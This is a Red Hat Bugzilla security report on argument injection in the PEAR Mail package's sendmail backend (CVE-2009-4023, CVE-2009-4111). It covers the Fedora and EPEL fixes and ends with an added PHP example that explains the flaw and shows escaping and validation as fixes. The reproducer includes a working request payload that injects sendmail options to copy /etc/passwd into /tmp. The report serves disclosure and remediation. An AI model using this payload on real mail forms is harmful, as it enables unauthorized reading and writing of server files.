Bug 540842 (CVE-2009-4023, CVE-2009-4111)
| Summary: | CVE-2009-4023 CVE-2009-4111 php-pear-Mail: Absent sanitization of mail header fields | ||
|---|---|---|---|
| Product: | [Other] Security Response | Reporter: | Jan Lieskovsky <jlieskov> |
| Component: | vulnerability | Assignee: | Red Hat Product Security <security-response-team> |
| Status: | CLOSED ERRATA | QA Contact: | |
| Severity: | high | Docs Contact: | |
| Priority: | high | ||
| Version: | unspecified | CC: | fedora, mjc |
| Target Milestone: | --- | Keywords: | Security |
| Target Release: | --- | ||
| Hardware: | All | ||
| OS: | Linux | ||
| URL: | http://pear.php.net/bugs/bug.php?id=16200 | ||
| Whiteboard: | |||
| Fixed In Version: | | Doc Type: | Bug Fix |
| Doc Text: | | Story Points: | --- |
| Clone Of: | | Environment: | |
| Last Closed: | 2010-12-21 22:04:57 UTC | Type: | --- |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | | Category: | --- |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | |||
| Bug Depends On: | 541964 | ||
| Bug Blocks: | |||
Description
Jan Lieskovsky
2009-11-24 10:37:59 UTC
Reproducer:
-----------
<?php
ini_set('include_path', ini_get('include_path') . ':/usr/local/lib/php/PEAR:');
require_once("Mail.php");

// Attacker-controlled request parameter goes straight into the From header.
$from = "From: " . $_REQUEST['email'] . "\r\n";
$to = "xxxxxxx";
$cc = "";
$bcc = "";
$subject = "subscription request";
$hdrs = array(
    "To" => $to,
    "Cc" => $cc,
    "Bcc" => $bcc,
    "From" => $from,
    "Subject" => $subject,
);
$body = "test";
// The sendmail backend passes the unsanitized From value on the sendmail command line.
$mail =& Mail::factory('sendmail');
$mail->send($to, $hdrs, $body);
?>

test.php?1=3&email=xxxxx%09-C%09/etc/passwd%09-X%09/tmp/wokao%09zzz@x%09.com&l=2&1=3
Note: You might need to change the path to ':/usr/share/pear/:'.
After this I can view the content of my /etc/passwd (with some add-ons) as /tmp/wokao.
This issue affects the versions of the php-pear-Mail package as shipped with Fedora releases 10, 11 and 12, and as shipped with the Extra Packages for Enterprise Linux 5 (EPEL-5) project. Please fix.

This is CVE-2009-4023.

php-pear-Mail-1.1.14-5.el5.1 has been submitted as an update for Fedora EPEL 5.
http://admin.fedoraproject.org/updates/php-pear-Mail-1.1.14-5.el5.1

Common Vulnerabilities and Exposures assigned a separate identifier of CVE-2009-4111 for the missing sanitization of the $recipients header of php-pear-Mail:

Argument injection vulnerability in Mail/sendmail.php in the Mail package 1.1.14, 1.2.0b2, and possibly other versions for PEAR allows remote attackers to read and write arbitrary files via a crafted $recipients parameter, and possibly other parameters, a different vulnerability than CVE-2009-4023.

References:
-----------
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4111
http://www.openwall.com/lists/oss-security/2009/11/23/8
http://www.openwall.com/lists/oss-security/2009/11/28/2
http://pear.php.net/bugs/bug.php?id=16200
https://bugs.gentoo.org/show_bug.cgi?id=294256

php-pear-Mail-1.1.14-5.fc11 has been pushed to the Fedora 11 stable repository. If problems still persist, please make note of it in this bug report.

php-pear-Mail-1.1.14-5.fc12 has been pushed to the Fedora 12 stable repository. If problems still persist, please make note of it in this bug report.

php-pear-Mail-1.1.14-5.fc10 has been pushed to the Fedora 10 stable repository. If problems still persist, please make note of it in this bug report.

php-pear-Mail-1.1.14-5.el5.1 has been pushed to the Fedora EPEL 5 stable repository. If problems still persist, please make note of it in this bug report.
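The following PHP example is added here to illustrate the bug above; it is not code from the PEAR Mail package, from the reproducer, or from this bug report. It models the kind of command string the sendmail backend hands to a shell (the /usr/sbin/sendmail path, the -i and -f flags and the shell_words() helper are assumptions made for the illustration), feeds it the reproducer's tab-separated email= value, and shows why the tabs turn into separate sendmail options, how escapeshellarg() collapses the value back into a single argument, and why validating the address before it reaches the shell is the stronger fix.

```php
<?php
// Added example, not code from PEAR Mail or from the bug report.
// Assumptions: sendmail lives at /usr/sbin/sendmail, is called with -i and
// -f<envelope sender> followed by "--" and the recipients, and the command
// string is run through a POSIX shell (as popen() does).

/**
 * Minimal model of POSIX shell word splitting, enough for the strings used
 * here: unquoted space, tab and newline separate words, single quotes group
 * text verbatim, and a backslash outside quotes protects the next character.
 * Double quotes, globbing and variable expansion are deliberately not modelled.
 */
function shell_words(string $cmd): array
{
    $words = [];
    $cur = '';
    $inWord = false;
    $len = strlen($cmd);
    for ($i = 0; $i < $len; $i++) {
        $c = $cmd[$i];
        if ($c === "'") {
            $end = strpos($cmd, "'", $i + 1);
            if ($end === false) {
                throw new RuntimeException('unterminated single quote');
            }
            $cur .= substr($cmd, $i + 1, $end - $i - 1);
            $inWord = true;
            $i = $end;
        } elseif ($c === '\\' && $i + 1 < $len) {
            $cur .= $cmd[++$i];
            $inWord = true;
        } elseif ($c === ' ' || $c === "\t" || $c === "\n") {
            if ($inWord) {
                $words[] = $cur;
                $cur = '';
                $inWord = false;
            }
        } else {
            $cur .= $c;
            $inWord = true;
        }
    }
    if ($inWord) {
        $words[] = $cur;
    }
    return $words;
}

// Unescaped concatenation: the pattern the update removed. Whatever whitespace
// the caller put in $from is interpreted by the shell, not by sendmail.
function vulnerable_command(string $from, array $recipients): string
{
    return '/usr/sbin/sendmail -i -f' . $from . ' -- ' . implode(' ', $recipients);
}

// Escaping alone: the hostile value still reaches sendmail, but as one
// argument (an unusable sender address), never as separate options.
function escaped_command(string $from, array $recipients): string
{
    return '/usr/sbin/sendmail -i -f' . escapeshellarg($from)
        . ' -- ' . implode(' ', array_map('escapeshellarg', $recipients));
}

// Validate first, escape anyway: anything that is not a bare address is
// rejected before a shell ever sees it.
function safe_command(string $from, array $recipients): string
{
    foreach (array_merge([$from], $recipients) as $addr) {
        if (filter_var($addr, FILTER_VALIDATE_EMAIL) === false) {
            throw new InvalidArgumentException('refusing to pass to sendmail: ' . $addr);
        }
    }
    return escaped_command($from, $recipients);
}

// Constructed input: the reproducer's email= value after URL decoding (%09 is a tab).
$injected = "xxxxx\t-C\t/etc/passwd\t-X\t/tmp/wokao\tzzz@x\t.com";
$rcpt = ['victim@example.com'];

// argv now contains -C, /etc/passwd, -X and /tmp/wokao as separate entries,
// so sendmail treats them as its own options; that is what copies
// /etc/passwd into /tmp/wokao in the reproducer.
print_r(shell_words(vulnerable_command($injected, $rcpt)));

// A single "-fxxxxx<tab>-C<tab>/etc/passwd..." argument: no option injection.
print_r(shell_words(escaped_command($injected, $rcpt)));

try {
    safe_command($injected, $rcpt);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
// Benign address: -f'alice@example.com' is joined by the shell into -falice@example.com.
print_r(shell_words(safe_command('alice@example.com', $rcpt)));
```

Run it with `php example.php`. The first print_r is the argv list sendmail actually received from the vulnerable code path; the second shows that escapeshellarg() (what the fixed package applies to the sender and each recipient) is sufficient to stop option injection, and safe_command() shows the additional validation a caller should apply so that malformed input is rejected with a clear error instead of being handed to the MTA at all.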